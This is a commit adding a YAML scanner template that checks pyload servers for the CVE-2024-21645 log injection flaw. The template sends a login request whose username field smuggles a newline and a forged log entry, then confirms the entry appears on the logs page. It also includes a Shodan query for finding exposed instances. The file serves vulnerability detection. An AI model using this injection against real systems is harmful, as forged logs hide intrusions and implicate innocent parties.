Merge pull request #9069 from isacaya/CVE-2024-21645

Create CVE-2024-21645.yaml
2024-02-05 16:26:21 +05:30 · 2024-02-05 16:26:21 +05:30 · 17b4572777
parent bea8e9a50d b99d0087dd
commit 17b4572777
1 changed files with 61 additions and 0 deletions
--- a/http/cves/2024/CVE-2024-21645.yaml
+++ b/http/cves/2024/CVE-2024-21645.yaml
@ -0,0 +1,61 @@
+id: CVE-2024-21645
+
+info:
+  name: pyload - Log Injection
+  author: isacaya
+  severity: medium
+  description: |
+    A log injection vulnerability was identified in pyload. This vulnerability allows any unauthenticated actor to inject arbitrary messages into the logs gathered by pyload.
+  impact: |
+    Forged or otherwise, corrupted log files can be used to cover an attacker's tracks or even to implicate another party in the commission of a malicious act.
+  reference:
+    - https://github.com/advisories/GHSA-ghmw-rwh8-6qmr
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-21645
+    - https://github.com/fkie-cad/nvd-json-data-feeds
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
+    cvss-score: 5.3
+    cve-id: CVE-2024-21645
+    cwe-id: CWE-74
+    epss-score: 0.00046
+    epss-percentile: 0.13723
+    cpe: cpe:2.3:a:pyload:pyload:*:*:*:*:*:*:*:*
+  metadata:
+    verified: true
+    vendor: pyload
+    product: pyload
+    shodan-query: title:"pyload"
+  tags: cve,cve2024,pyload,authenticated,injection
+
+variables:
+  str: "{{rand_base(6)}}"
+
+http:
+  - raw:
+      - |
+        POST /login?next={{RootURL}} HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        do=login&username={{randstr}}\'%0a[1970-01-01 00:00:00]  INJECTED               {{str}}  THIS ENTRY HAS BEEN INJECTED&password=wrong&submit=Login
+
+      - |
+        POST /login?next={{RootURL}}/logs HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        do=login&username={{username}}&password={{password}}&submit=Login
+
+    redirects: true
+    max-redirects: 1
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<td>1970-01-01 00:00:00</td><td class="loglevel">INJECTED</td><td class="logsource">{{str}}</td><td>THIS&nbsp;ENTRY&nbsp;HAS&nbsp;BEEN&nbsp;INJECTED&#39;</td>'
+
+      - type: status
+        status:
+          - 200